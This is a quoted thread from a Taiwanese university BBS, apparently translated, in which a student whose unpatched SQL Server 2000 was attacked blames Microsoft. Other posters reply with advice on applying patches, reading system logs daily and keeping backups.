《 In the post by fool...@bbs.pu.edu.tw (我是大笨蛋): 》
: 【 In the post by yugibe...@bbs.tku.edu.tw (遺憾): 】

: : 《 In the post by Besse...@bbs.nsysu.edu.tw (我將歸來開放): 》
: : : I just took a database course this semester
: : : The teacher recommended we use SQL 2000
: : : Not long after installing it, I got hit
: : : Microsoft's products are the most widespread
: : : so it's understandable that they become hackers' targets
: : : but Microsoft itself should recognise that too, right?
: : : All they did was express regret over this attack
: : : and say the vulnerability was published long ago and users should download the fix themselves
: : : This is their attitude every time
: : : I've decided to switch to MySQL from now on
: : Let me be honest:
: : with your attitude
: : you won't escape being attacked no matter what you use.
: : First ask yourself
: : why, when the fix came out half a year ago,
: : you hadn't installed it.
: Hmm~ there are no insecure systems, only insecure people.....
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
This sentence is wrong. No system is secure; the problem lies with people. A good administrator should
read the system logs every day.... check which patches have been released and which system problems have
been found, rather than setting up a computer and then leaving it alone....... One more thing: you need
to have the concept of backups.. it's very important.

